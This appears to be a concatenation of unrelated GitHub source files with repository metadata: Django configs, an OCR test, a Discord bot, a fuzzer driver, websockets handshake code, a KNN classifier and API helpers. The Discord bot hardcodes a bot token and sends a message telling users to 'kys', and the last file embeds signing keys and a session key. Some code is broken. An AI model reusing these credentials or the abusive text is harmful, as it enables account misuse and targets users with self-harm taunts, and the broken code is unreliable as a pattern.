package_name = 'Except'
for reserve_name in except_error_list[1:]:
if reserve_name == 'as':
break
if reserve_name[0].isalpha() or reserve_name[0] == '_':
reserved_list.add(reserve_name)
if reserved_list:
add_reserveds(package_name, reserved_list)
def transform_builder(self, builder_list):
"""Parse a Kivy load_file statement.
Parameters
builder_list : list
Kivy Builder.load_file statement.
"""
return ''.join([
builder_list[0],
"'",
obfuscate_path(builder_list[1].strip("'")),
"'",
builder_list[2]
])
| [
"rdevost@vinntech.com"
] | rdevost@vinntech.com |
a43a94fe49f1a181172f2b8eeeea80d2cf798ac7 | 2d159be77b57885577ded673a45864f09fc2a325 | /gio_spa/gio_spa/asgi.py | 844d6ed81ac4ac40b3201ee58a2e8fb3c1250554 | [] | no_license | mimrot47/Rest_Api_project | 9c6f7a0f4d03dd5ca39f75430f0f6185048b775b | 1676a15f889c13b45f05762efa6516080da54d7e | refs/heads/main | 2023-05-15T08:55:02.004292 | 2021-06-05T06:14:06 | 2021-06-05T06:14:06 | 374,035,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
ASGI config for gio_spa project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gio_spa.settings')
application = get_asgi_application()
| [
"mimrot47@gmail.com"
] | mimrot47@gmail.com |
8fd146079d1a9f6917223a64b72335f79a3d52f5 | fbec714e4080ba960a4579db9b968d6b7fbd271c | /test.py | d7b4dca8b5db5b9d3dfe5966c20691358f8469a9 | [] | no_license | Harshul-24/seq2seq-attention-ocr-pytorch | ad0f4430473ec449eda8dc383163a3de35c681c6 | 438c7d1ea43cd7ce1976313d6b6df14f8e2d7dd9 | refs/heads/master | 2023-06-30T18:33:11.069771 | 2021-07-24T16:40:03 | 2021-07-24T16:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py | import torch
from PIL import Image
from pytorch_lightning import Trainer
from src.aocr import OCR, OCRDataModule
from src.utils import dataset, utils
def test(
test_path,
is_dataset = False,
output_pred_path='output.txt',
checkpoint_path='models/aocr.pth'
):
ocr = OCR()
ocr.load_state_dict(torch.load(checkpoint_path))
ocr.eval()
if is_dataset:
dm = OCRDataModule(test_list=test_path)
t = Trainer()
t.test(ocr, dm)
else:
transformer = dataset.ResizeNormalize(img_width=ocr.img_width, img_height=ocr.img_height)
image = Image.open(test_path).convert('RGB')
image = transformer(image)
image = image.view(1, *image.size())
image = torch.autograd.Variable(image)
decoder_outputs, attention_matrix = ocr(image, None, is_training=False, return_attentions=True)
words, prob = utils.get_converted_word(decoder_outputs, get_prob=True)
return words, prob, attention_matrix
if __name__ == "__main__":
w,_,_ = test(r'data/predict-1-12/image.PNG')
di = utils.digitIterator(w)
# with open("sample.txt", "w", encoding="utf-8") as f:
# f.write(di.get_str())
print(w,di.get_str())
| [
"sumanmichael01@gmail.com"
] | sumanmichael01@gmail.com |
f960540c3fb3be6af7a98ec90b85f320fe56808f | 2a40c887a0d51dcd3338aa82e4d93819fb11a8bb | /bot.py | b01fe153d0e371bed8a781b65261764dc0d4fb3a | [] | no_license | RIHARDA/Roblox | 17bdbba49e73b6ff022f3f62e7b557c31f5012d0 | f426d9f65edc782c7d330af157bcac536ad84590 | refs/heads/master | 2020-03-31T05:09:45.752282 | 2018-10-07T11:50:47 | 2018-10-07T11:50:47 | 151,935,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,588 | py | import discord
from discord.ext.commands import Bot
from discord.ext import commands
import asyncio
import time
import random
from discord import Game
Client = discord.client
client = commands.Bot(command_prefix = '$')
Clientdiscord = discord.Client()
@client.event
async def on_member_join(member):
print('Recognised that a member called ' + member.name + ' joined')
await client.send_message(member, 'yooo thank for joining')
print('Sent message to ' + member.name)
async def on_ready():
await client.change_presence(game=Game(name='With People'))
print('Ready, Freddy')
@client.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def ban(ctx , user : discord.Member):
author = ctx.message.author
Server = ctx.message.server
await client.ban(user)
@client.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def kick(ctx , user : discord.Member):
author = ctx.message.author
Server = ctx.message.server
await client.kick(user)
@client.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def unban(ctx , user : discord.Member):
author = ctx.message.author
Server = ctx.message.server
await client.unban(user)
@client.event
async def on_message(message):
if message.content == '$invite':
await client.send_message(message.channel,' <@%s> https://discordapp.com/api/oauth2/authorize?client_id=493529797130059798&permissions=8&scope=bot')
await client.send_message(message.channel,(random.choice(randomlist)))
if message.content.startswith('$help'):
await client.send_message(message.channel,'<@%s> Help is Not A Command Yes Due to delevoper working on me')
@client.event
async def on_message(message):
if ('heck') in message.content:
await client.delete_message(message)
if message.content == 'heck':
await client.send_message(message.channel,'NO SWEARING ITS A CHRISTIAN SERVER!!!')
if message.content.startswith('%scoinflip' %(prefix)):'$'
randomlist = ['heads','tails',]
await client.send_message(message.channel,(random.choice(randomlist)))
if message.content.startswith('%sdiceroll' %(prefix)):'$'
randomlist = ['1','2','3','4','5','6',]
await client.send_message(message.channel,(random.choice(randomlist)))
if message.content == prefix +'your_mum_gay':
await client.send_message(message.channel,' Dude your_mum_gay')
if message.content == prefix +'creator':
await client.send_message(message.channel,'I Am Created By Developer: Aj#1636.')
if message.content == prefix +'hi':
await client.send_message(message.channel)
('hello')
if message.content == prefix +'help':
await client.send_message(message.channel,'hey dude my predix is `$`.')
@client.event
async def on_message(message):
if message.content == '$ping':
await client.send_message(message.channel,'pong')
if message.content == '$img':
em = discord.Embed(description='Anime cat girl lol')
em.set_image(url='https://cdn.discordapp.com/attachments/436300751711633410/494223717853822996/tenor.gif')
await client.send_message(message.channel, embed=em)
if ('Hello') in message.content:
await client.delete_message(message)
if message.content == '$say no u':
await client.send_message(message.channel,'no u')
if message.content == '$say aj amzing':
await client.send_message(message.channel,'aj amzing')
if message.content == '$say lol':
await client.send_message(message.channel,'lol')
if message.content == '$no_u':
await client.send_message(message.channel,'no u')
if message.content.startswith('$'):
randomlist = ["is back", "returns", "is amazing"]
await client.send_message(message.channel,(random.choice(randomlist)))
if message.content.startswith('$twlljoke'):
randomlist = ["your mum is gay", "your dad is lesbian", "your sister mister", "your brother mother"]
await client.send_message(message.channel,(random.choice(randomlist)))
if message.content == '$info':
await client.send_message(message.channel,'idk why you here lol just kys,,,, type "$help" for some help :) xD')
if message.content == '$help2':
await client.send_message(message.channel,'commands are: "$ping", "$img", "$your_mum_gay", "$no_u", "$sovietrussia", "$twlljoke", "$info", "$help"')
client.run('NDk2MDg2NjI2NDUyMzczNTY0.DpgXEQ.eSFmx8kwxav4j0PdOLZL8ooPsZU')
# Starts the bot.
| [
"noreply@github.com"
] | noreply@github.com |
8202af22fadd2dfe1949f94d3867d8fe381f2584 | 5e22770baeaea428fe49f0ae5fb504bc99194593 | /autofz/fuzzer_driver/angora.py | 6b6e7ae3f9140fa9dc0785bafdf15ad6f2a09166 | [
"MIT"
] | permissive | sslab-gatech/autofz | 0b1c0c68849301efc5f51c97e50a5686416b692b | b9a795dda252aa37406d593434b710b0fbedd177 | refs/heads/main | 2023-08-01T08:24:07.236758 | 2023-04-25T22:12:49 | 2023-04-25T22:12:49 | 605,261,111 | 45 | 4 | null | null | null | null | UTF-8 | Python | false | false | 5,738 | py | import os
import pathlib
import sys
import time
import peewee
# from .. import config as Config
from autofz import config as Config
from . import afl
from .controller import Controller
from .db import AngoraModel, ControllerModel, db_proxy
from .fuzzer import FuzzerDriverException, PSFuzzer
CONFIG = Config.CONFIG
FUZZER_CONFIG = CONFIG['fuzzer']
class Angora(PSFuzzer):
def __init__(self,
seed,
output,
group,
program,
argument,
thread=1,
pid=None,
cgroup_path = ''):
'''
fuzzer_id used to distinguish different slaves
'''
debug_file=os.path.realpath(os.path.join(output,'..','..','autofz_angora.log'))
debug = False
super().__init__(pid, debug=debug, debug_file=debug_file)
self.seed = seed
self.output = output
self.group = group
self.program = program
self.argument = argument
self.name = 'angora'
self.thread = thread
self.cgroup_path = cgroup_path
self.__proc = None
self.__fuzzer_stats = None
def update_fuzzer_stats(self):
fuzzer_stats_file = f'{self.output}/angora/fuzzer_stats'
self.__fuzzer_stats = afl.parse_fuzzer_stats(fuzzer_stats_file)
@property
def fuzzer_stats(self):
if self.__fuzzer_stats is None:
self.update_fuzzer_stats()
return self.__fuzzer_stats
@property
def pid_(self):
if not self.fuzzer_stats: return None
return int(self.fuzzer_stats['fuzzer_pid'])
@property
def is_ready(self):
return self.fuzzer_stats is not None
def gen_env(self):
LD_LIBRARY_PATH = os.environ.get('LD_LIBRARY_PATH')
NEW_PATH = f'/fuzzer/angora/clang+llvm/lib:{LD_LIBRARY_PATH}'
return {'ANGORA_DISABLE_CPU_BINDING': '1',
'LD_LIBRARY_PATH':NEW_PATH}
@property
def target(self):
global FUZZER_CONFIG
target_root = FUZZER_CONFIG['angora']['target_root']
return os.path.join(target_root, self.group,self.program,self.program)
@property
def target_taint(self):
global FUZZER_CONFIG
target_root = FUZZER_CONFIG['angora']['target_root_taint']
return os.path.join(target_root, self.group,self.program,self.program)
def gen_cwd(self):
return os.path.dirname(self.target)
def check(self):
ret = True
ret &= os.path.exists(self.target)
ret &= os.path.exists(self.target_taint)
if not ret:
raise FuzzerDriverException
def gen_run_args(self):
self.check()
global FUZZER_CONFIG
command = FUZZER_CONFIG['angora']['command']
args = []
if self.cgroup_path:
args += ['cgexec','-g',f'cpu:{self.cgroup_path}']
args += [command]
args += ['-M', str(0)]
args += ['--jobs', str(self.thread)]
args += ['-S']
args += ['--input', self.seed]
args += ['--output', self.output]
args += [
'-t',
self.target_taint
]
args += [
'--',
self.target
]
args += self.argument.split(' ')
return args
class ANGORAController(Controller):
def __init__(self, seed, output, group, program, argument, thread=1, cgroup_path=''):
self.db = peewee.SqliteDatabase(
os.path.join(Config.DATABASE_DIR, 'autofz-angora.db'))
self.name = 'angora'
self.seed = seed
self.output = output
self.group = group
self.program = program
self.argument = argument
self.thread = thread
self.cgroup_path = cgroup_path
self.angoras = []
self.kwargs = {
'seed': self.seed,
'output': self.output,
'group': self.group,
'program': self.program,
'argument': self.argument,
'thread': self.thread,
'cgroup_path' : self.cgroup_path
}
def init(self):
db_proxy.initialize(self.db)
self.db.connect()
self.db.create_tables([AngoraModel, ControllerModel])
for fuzzer in AngoraModel.select():
angora = Angora(seed=fuzzer.seed,
output=fuzzer.output,
group=fuzzer.group,
program=fuzzer.program,
argument=fuzzer.argument,
thread=fuzzer.thread,
pid=fuzzer.pid)
self.angoras.append(angora)
def start(self):
if self.angoras:
print('already started', file=sys.stderr)
return
# start Angora
angora = Angora(**self.kwargs)
angora.start()
# wait angora pid
while not angora.is_ready:
time.sleep(1)
AngoraModel.create(**self.kwargs, pid=angora.pid_)
ControllerModel.create(scale_num=1)
time.sleep(10)
ready_path = os.path.join(self.output, 'ready')
pathlib.Path(ready_path).touch(mode=0o666, exist_ok=True)
def scale(self, scale_num):
'''
NOTE: angora uses thread model
'''
pass
def pause(self):
for angora in self.angoras:
angora.pause()
def resume(self):
'''
NOTE: prserve scaling
'''
controller = ControllerModel.get()
for angora in self.angoras:
angora.resume()
def stop(self):
for angora in self.angoras:
angora.stop()
self.db.drop_tables([AngoraModel, ControllerModel])
| [
"yufu@gatech.edu"
] | yufu@gatech.edu |
cf3e02a47a50e7f8e35623384b86ddcc999afb4e | 862d67a22cfe79eca0453331ceba86c251fabcf2 | /project_env/lib/python3.6/site-packages/websockets/handshake.py | fedc6c502388cf431fbd148f85c3cb0ad10a1f94 | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | tejon-melero/minimal-python-web3-read-blockchain-example | acc66edbfeba6594ba77bd770e7da705c7b0f5f4 | f6983e4b87323670aded2498337012a18c03522e | refs/heads/master | 2022-12-16T20:50:19.383597 | 2018-10-19T12:23:05 | 2018-10-19T12:23:05 | 150,777,051 | 3 | 3 | null | 2022-11-03T07:39:04 | 2018-09-28T18:01:41 | Python | UTF-8 | Python | false | false | 5,218 | py | """
The :mod:`websockets.handshake` module deals with the WebSocket opening
handshake according to `section 4 of RFC 6455`_.
.. _section 4 of RFC 6455: http://tools.ietf.org/html/rfc6455#section-4
It provides functions to implement the handshake with any existing HTTP
library. You must pass to these functions:
- A ``set_header`` function accepting a header name and a header value,
- A ``get_header`` function accepting a header name and returning the header
value.
The inputs and outputs of ``get_header`` and ``set_header`` are :class:`str`
objects containing only ASCII characters.
Some checks cannot be performed because they depend too much on the
context; instead, they're documented below.
To accept a connection, a server must:
- Read the request, check that the method is GET, and check the headers with
:func:`check_request`,
- Send a 101 response to the client with the headers created by
:func:`build_response` if the request is valid; otherwise, send an
appropriate HTTP error code.
To open a connection, a client must:
- Send a GET request to the server with the headers created by
:func:`build_request`,
- Read the response, check that the status code is 101, and check the headers
with :func:`check_response`.
"""
import base64
import binascii
import hashlib
import random
from .exceptions import InvalidHeaderValue, InvalidUpgrade
from .headers import parse_connection, parse_upgrade
__all__ = [
'build_request', 'check_request',
'build_response', 'check_response',
]
GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
def build_request(set_header):
"""
Build a handshake request to send to the server.
Return the ``key`` which must be passed to :func:`check_response`.
"""
raw_key = bytes(random.getrandbits(8) for _ in range(16))
key = base64.b64encode(raw_key).decode()
set_header('Upgrade', 'websocket')
set_header('Connection', 'Upgrade')
set_header('Sec-WebSocket-Key', key)
set_header('Sec-WebSocket-Version', '13')
return key
def check_request(get_header):
"""
Check a handshake request received from the client.
If the handshake is valid, this function returns the ``key`` which must be
passed to :func:`build_response`.
Otherwise it raises an :exc:`~websockets.exceptions.InvalidHandshake`
exception and the server must return an error like 400 Bad Request.
This function doesn't verify that the request is an HTTP/1.1 or higher GET
request and doesn't perform Host and Origin checks. These controls are
usually performed earlier in the HTTP request handling code. They're the
responsibility of the caller.
"""
connection = parse_connection(get_header('Connection'))
if not any(value.lower() == 'upgrade' for value in connection):
raise InvalidUpgrade('Connection', get_header('Connection'))
upgrade = parse_upgrade(get_header('Upgrade'))
# For compatibility with non-strict implementations, ignore case when
# checking the Upgrade header. It's supposed to be 'WebSocket'.
if not (len(upgrade) == 1 and upgrade[0].lower() == 'websocket'):
raise InvalidUpgrade('Upgrade', get_header('Upgrade'))
key = get_header('Sec-WebSocket-Key')
try:
raw_key = base64.b64decode(key.encode(), validate=True)
except binascii.Error:
raise InvalidHeaderValue('Sec-WebSocket-Key', key)
if len(raw_key) != 16:
raise InvalidHeaderValue('Sec-WebSocket-Key', key)
version = get_header('Sec-WebSocket-Version')
if version != '13':
raise InvalidHeaderValue('Sec-WebSocket-Version', version)
return key
def build_response(set_header, key):
"""
Build a handshake response to send to the client.
``key`` comes from :func:`check_request`.
"""
set_header('Upgrade', 'websocket')
set_header('Connection', 'Upgrade')
set_header('Sec-WebSocket-Accept', accept(key))
def check_response(get_header, key):
"""
Check a handshake response received from the server.
``key`` comes from :func:`build_request`.
If the handshake is valid, this function returns ``None``.
Otherwise it raises an :exc:`~websockets.exceptions.InvalidHandshake`
exception.
This function doesn't verify that the response is an HTTP/1.1 or higher
response with a 101 status code. These controls are the responsibility of
the caller.
"""
connection = parse_connection(get_header('Connection'))
if not any(value.lower() == 'upgrade' for value in connection):
raise InvalidUpgrade('Connection', get_header('Connection'))
upgrade = parse_upgrade(get_header('Upgrade'))
# For compatibility with non-strict implementations, ignore case when
# checking the Upgrade header. It's supposed to be 'WebSocket'.
if not (len(upgrade) == 1 and upgrade[0].lower() == 'websocket'):
raise InvalidUpgrade('Upgrade', get_header('Upgrade'))
if get_header('Sec-WebSocket-Accept') != accept(key):
raise InvalidHeaderValue(
'Sec-WebSocket-Accept', get_header('Sec-WebSocket-Accept'))
def accept(key):
sha1 = hashlib.sha1((key + GUID).encode()).digest()
return base64.b64encode(sha1).decode()
| [
"matthias.karacsonyi@gmail.com"
] | matthias.karacsonyi@gmail.com |
5fc343ec90562a8219c711b173ff55a920e06348 | 7dd0264f3aced4bb7b798fe19862ab545bdd8e38 | /account/models.py | 39e63eae1112ecf6204d157496ec188a4a2205e2 | [] | no_license | NSLIGHT/fullthrottledjangoapp | 593e60404644499fa284d248adee459b9e5cbf70 | a1d57a49e9ce596e6b1552998d4753c953243a7d | refs/heads/master | 2022-12-23T06:43:55.331335 | 2020-09-22T05:59:13 | 2020-09-22T05:59:13 | 297,293,529 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | from django.db import models
from django.db import models
from django.contrib.auth.models import User
from django.utils.timezone import now
import datetime
from django.contrib.postgres.fields import ArrayField
class member(models.Model):
id = models.CharField(verbose_name = "id",max_length=100,primary_key=True,unique=True)
real_name = models.CharField(unique=True,max_length=100)
tz = models.CharField(max_length=100)
last_login = models.DateTimeField(default=now,auto_now=False, auto_now_add=False)
last_logout = models.DateTimeField(default=now,auto_now=False, auto_now_add=False)
def __str__(self):
return self.real_name
class start_end_time(models.Model):
start_time = models.DateTimeField(default=now,auto_now=False, auto_now_add=False,null=True,blank=True,verbose_name="start_time")
end_time = models.DateTimeField(default=now,auto_now=False, auto_now_add=False,null=True,blank=True,verbose_name="end_time")
def __str__(self):
return str(self.start_time) + ", " + str(self.end_time)
class membership(models.Model):
id = models.CharField(verbose_name = "id",max_length=100,primary_key=True,unique=True)
real_name = models.CharField(unique=True,max_length=100)
tz = models.CharField(max_length=100)
activity_period = models.ForeignKey(start_end_time,on_delete=models.CASCADE)
def __str__(self):
return self.real_name
# class UserManager(BaseUserManager):
# def create_user(self, id,real_name,password=None):
# if not id:
# raise ValueError("User must have a id")
# if not real_name:
# raise ValueError("User must have a real name")
# user = self.model(
# id = id,
# real_name = real_name,
# password = password,
# )
# user.set_password(password)
# user.save(using=self._db)
# return user
# def create_superuser(self,id,real_name,password):
# user = self.create_user(
# id = id,
# real_name = real_name,
# password = password,
# )
# user.is_admin = True
# user.is_staff = True
# user.is_superuser = True
# user.save(using=self._db)
# return user
# def authenticate(self, request, real_name=None, password=None):
# login_valid = (settings.ADMIN_LOGIN == real_name)
# pwd_valid = check_password(password, settings.ADMIN_PASSWORD)
# if login_valid and pwd_valid:
# try:
# user = User.objects.get(real_name=real_name)
# except User.DoesNotExist:
# # Create a new user. There's no need to set a password
# # because only the password from settings.py is checked.
# user = User(real_name=real_name)
# user.is_staff = True
# user.is_superuser = True
# user.save()
# return user
# return None
| [
"newtonkaleja@gmail.com"
] | newtonkaleja@gmail.com |
82a29e952d943526f88af2dd50b7eda0da44f165 | a38aa3779c16f31d02a2df031fd4ce072facaeb9 | /project/utils.py | 7ae54df72e5e3e66e59363eb3dbee5eab2359549 | [
"MIT"
] | permissive | nikifkon-old/csa-almaty-bot | a0a39673dfa39eb5f6ac6dd58eea08008d52c350 | f18d087c86b3b90171dec080e780e330d62e711a | refs/heads/master | 2022-11-30T07:16:45.839562 | 2020-08-19T09:48:39 | 2020-08-19T09:48:39 | 288,692,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | QUESTION_CHAR = "❓"
EXCLAMATION_CHAR = "❗️"
SEARCH_CHAR = "🔎"
BACK_CHAR = "🔙"
MENU_CHAR = "☰"
BACK_TO_MENU_TEXT = "{prefix} Вернуться к списку категорий".format(prefix=MENU_CHAR)
BACK_TO_SEARCH_RESULT = "{prefix} Вернуться к результатам поиска".format(prefix=BACK_CHAR)
OPEN_SEARCH = "{prefix} Найти вопрос".format(prefix=SEARCH_CHAR)
TRY_SEARCH_AGAIN = "{prefix} Попробовать найти ещё раз".format(prefix=SEARCH_CHAR)
| [
"kostya.nik.3854@gmail.com"
] | kostya.nik.3854@gmail.com |
5b2cfdc8e73ea9308c9325c317d819077673550c | ad9d7c6103338da7f0786713fcc6e3797a5086ee | /user/models.py | 4e753e578aa6c6a16edbf081664c864167aa72c3 | [] | no_license | Azazel5/CareerAlly | 2a9ca43faef875054a762b663ab371ca959dd05f | 2dbd137593243816fa70ecd571351ff2d5675f7d | refs/heads/master | 2021-05-18T04:18:14.347406 | 2020-04-20T16:13:55 | 2020-04-20T16:13:55 | 251,102,423 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | from django.db import models
from django.contrib.auth.models import User
from internship.models import InternshipModel
class UserInternshipProfile(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
internships_applied = models.ForeignKey(InternshipModel, on_delete=models.CASCADE, blank=True, null=True)
notes = models.TextField(blank=True, null=True)
def __str__(self):
return self.user.username + ' - ' + f'({self.internships_applied.pk}) ' + self.internships_applied.position_name
| [
"subhanga2013@gmail.com"
] | subhanga2013@gmail.com |
ee84a86fbfe3005a8273fc6ab0187d6b08601a5f | 4fa8af452baec12a47f3148b654cf2c51efee869 | /lab3/main.py | c989e48b717bf3bee0f3ef9322c1041cefbd2fed | [] | no_license | VitalyVV/inno_datamining_spring | 168b4e591c45c5821782c8bc37f16469e126860b | ddd9d935b72125fbac632d209e8cf000fdd2c6bf | refs/heads/master | 2020-04-21T02:29:54.081084 | 2019-02-28T10:44:44 | 2019-02-28T10:44:44 | 169,256,450 | 0 | 0 | null | 2019-02-28T10:45:58 | 2019-02-05T14:44:41 | Jupyter Notebook | UTF-8 | Python | false | false | 81 | py | from .noisy_mnist import dataset
import numpy as np
noisy, clean = dataset()
| [
"v.volobuev@innopolis.ru"
] | v.volobuev@innopolis.ru |
41e48a86030f730e374988d7f00909bc2d3b0cc9 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/age_sex_20190618092905.py | f95b9e064c825ab7d3d8a555a7f973fcb638f23b | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHR-all')#txt目录提取
for emrtxt in emrtxts:
f = open(emrtxt,'r',errors="ignore")#中文加入errors
emrtxt = os.path.basename(emrtxt)
emrtxt_str = re.findall(r'(^.+?)\_',emrtxt)#提取ID
emrtxt = "".join(emrtxt_str)#转成str
out = []
for line in f.readlines():
if line=='男':
out.append(line)
elif line.‘女'
out.append(line)
if line.find('岁')>-1:
line = re.sub('岁','',line)
lien = ''.join(line)
out.append(line)
break
output = ' '.join(out)
EMRdef.text_create(r'D:\DeepLearning ER\EHRbase','.txt' ,emrtxt,output)
| [
"1044801968@qq.com"
] | 1044801968@qq.com |
57664c1e088570fae17e7586a13f77cbd55ccdca | 707409bcdc1dcc7c729696e8d0684c4bd05786c8 | /Sources/Gotcha/MouseControl.py | 49411175c8a5f10796d45b0d432e2d4e055c7d1c | [
"MIT"
] | permissive | KHUNerds/Gotcha | f1f58f1f42d4f2bf40516e6efbc231cb07917db9 | b0160da96d54cd48e5f9072d1acc4d491af0c577 | refs/heads/main | 2023-06-12T08:49:45.764110 | 2021-07-09T18:38:08 | 2021-07-09T18:38:08 | 384,382,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | import pyautogui
def MousePosition() -> None:
return pyautogui.position()
def MouseMove(x : int, y : int, t : int = 0) -> None:
print("moved mouse", x, y, "while", t, "seconds")
pyautogui.moveTo(x, y, t)
def MouseClickLeft(count : int = 1) -> None:
print("clicked mouse", count)
pyautogui.click(clicks=count)
def MouseClickRight() -> None:
print("clicked mouse right")
pyautogui.rightClick()
def MouseScroll(x : int) -> None:
print("scrolled while", x)
pyautogui.scroll(x)
def MouseDrag(x : int, y : int, t : int = 0) -> None:
print("draged mouse", x, y, "while", t, "seconds")
pyautogui.dragTo(x, y, t) | [
"ssw03270@khu.ac.kr"
] | ssw03270@khu.ac.kr |
ea3aaa6e8b48540aa2d29098078de3207772a425 | 793ae2359153ad760fd9d096a477e239eaf1c517 | /KNearestNeighbors/kd_tree_knn.py | f415ccba11bbe16d85172dd90d1758cec4225ac6 | [] | no_license | kitkitkit745/MLTemplate | 6323640f11c48db0e369af355fceeef924cb96e0 | 129fa3b80167368523c87fe7ae93993e5c6ea8e0 | refs/heads/master | 2023-06-01T02:42:44.698095 | 2021-06-19T11:38:07 | 2021-06-19T11:38:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,495 | py | import numpy as np
from sklearn.neighbors import KDTree
class KDTreeKNN:
def __init__(self, k):
'''K Nearest Neighbors Classifier
This algorithm implement K neighbors with KDTree.
Args:
k: number of neighbors used in prediction stage
'''
self.k = k
def fit(self, X, y):
self.kdtree = KDTree(X)
self.labels = y
def predict(self, X):
'''
:param X: N x M
:return:
'''
if len(X.shape) == 1:
X = X[:, np.newaxis]
_, indices = self.kdtree.query(X, self.k)
nei_labels = self.labels[indices]
pred_y = np.asarray([np.argmax(np.bincount(l)) for l in nei_labels])
assert len(pred_y) == len(X)
return pred_y
if __name__ == '__main__':
from sklearn import datasets
data, labels = datasets.load_digits(return_X_y=True)
# data = np.load('../data/mnist/mnist_data.npy')
# labels = np.load('../data/mnist/mnist_labels.npy')
n_sample = len(data)
shuffle = np.random.permutation(n_sample)
data = data[shuffle]
labels = labels[shuffle]
split = int(n_sample * 0.8)
train_data, test_data = data[:split], data[split:]
train_labels, test_labels = labels[:split], labels[split:]
model = KDTreeKNN(25)
model.fit(train_data, train_labels)
test_pred = model.predict(test_data)
from utils.metric import accuracy
print('ScratchKNN Acc: %.4g' % accuracy(test_labels, test_pred))
| [
"1370454515@qq.com"
] | 1370454515@qq.com |
40d8671c94da3a301dcd8dd73470c1af8be6c4dc | 4f2cdd9a34fce873ff5995436edf403b38fb2ea5 | /Data-Structures/List/Part2/P003.py | b6642ac9b5001105f692e511ac814eb924a9b9b2 | [] | no_license | sanjeevseera/Python-Practice | 001068e9cd144c52f403a026e26e9942b56848b0 | 5ad502c0117582d5e3abd434a169d23c22ef8419 | refs/heads/master | 2021-12-11T17:24:21.136652 | 2021-08-17T10:25:01 | 2021-08-17T10:25:01 | 153,397,297 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | """
Write a Python program to generate all permutations of a list in Python.
"""
import itertools
print(list(itertools.permutations([1,2,3]))) | [
"seerasanjeev@gmail.com"
] | seerasanjeev@gmail.com |
f1d4e78aa1876b8fbdb6f861d9de041b37b3fe01 | 53c1f83d6582e9fe36ba655470fbe5d7f96f459f | /Fis_Api/Fis_Ewire_Api/statics/staticfunctions.py | b59534a86976d0c07931ed97764512ae1b2b4911 | [] | no_license | aaronpaz123/pomona-R-D | 66303fabc456ea32a07fcaf058dbdc7dd36d69a0 | e2e4430b0eadec682b31a1b5ca1832ea7bad23ea | refs/heads/main | 2023-08-28T07:43:31.561616 | 2021-10-26T11:31:51 | 2021-10-26T11:31:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py | import requests
import json
class CommonUtil:
# Error handled post requests
def postrequestManager(URL,headers,fwReqJson):
print("code is postrequestManager")
try:
print("postrequestManager PAYLOAD ==>"+ str(fwReqJson))
print("postrequestManager HEADERS ==>"+ str(headers))
print("postrequestManager HIT URL ==>"+ str(URL))
r = requests.post(URL, headers=headers, data=fwReqJson)
print("AFTER HIT FIS ==>", r.json())
return r.json()
except requests.exceptions.HTTPError as err:
return str(err)
except requests.Timeout as e:
return "Request Timed Out"
except requests.RequestException as e:
return "Request Exception detected :"
except requests.ConnectionError as e:
return str(e)
except Exception as e:
return {"status":"error","message":str(e)}
class CommonResponse:
reqDict = dict()
# This method provides the data necessary to generate a valid token
def __init__(self,reqDict = None):
if reqDict is None:
self.reqDict = dict()
self.reqDict["KEY_ALIAS"] = "0kbOdd5Zc0ccbd7090PtMA==.t7SEZXtjq1vF9JEYUbBXPg=="
self.reqDict["INSTITUTION_ID"] = "0w5xC29wvYvRqQeYBPtajg==.tyayfH/qZw4hfuxAEYlnCA=="
self.reqDict["APP_ID"] = ""
self.reqDict["SIGNATURE"] = "0sjqRg8nkKdxreZam16RgfZavEwEhY62uldUQQn/AjS33appwao6cbM2VlaJfIckl2LZHlVoTdANDHaZ4bLuPwhuStrROljeDeiZzyLVvhN69oM/9typX2qWrcH4x6UsoIX+kfp51YvxcYR4AiVyP8rTbINbBX//JMkv7XeTp+6tDfs+Efws0k+YqWqVouwnAnUf6+7HTn096ZsjN9uBWu5QcdDtpKOG2A99itfqtQ/O4HuGVwyUJIYB29yUU/Gmub/2mHnBSVu49KqYigLHGR3MpVTVMjNxdZELKLjDikdXVwDBe7UZEmS/y/5RriEy68T2bgTsRz6t84QLE6Heew=="
self.reqDict["SESSION_KEY"] = "mJpiCKZpCJG0dgS5EALL2HLKik+fOSW7MwtgytVQlmg="
def get_auth_head(self,url,headers,status):
payload = dict()
payload["KEY_ALIAS"] = "0kbOdd5Zc0ccbd7090PtMA==.t7SEZXtjq1vF9JEYUbBXPg=="
payload["INSTITUTION_ID"] = "0w5xC29wvYvRqQeYBPtajg==.tyayfH/qZw4hfuxAEYlnCA=="
payload["APP_ID"]=""
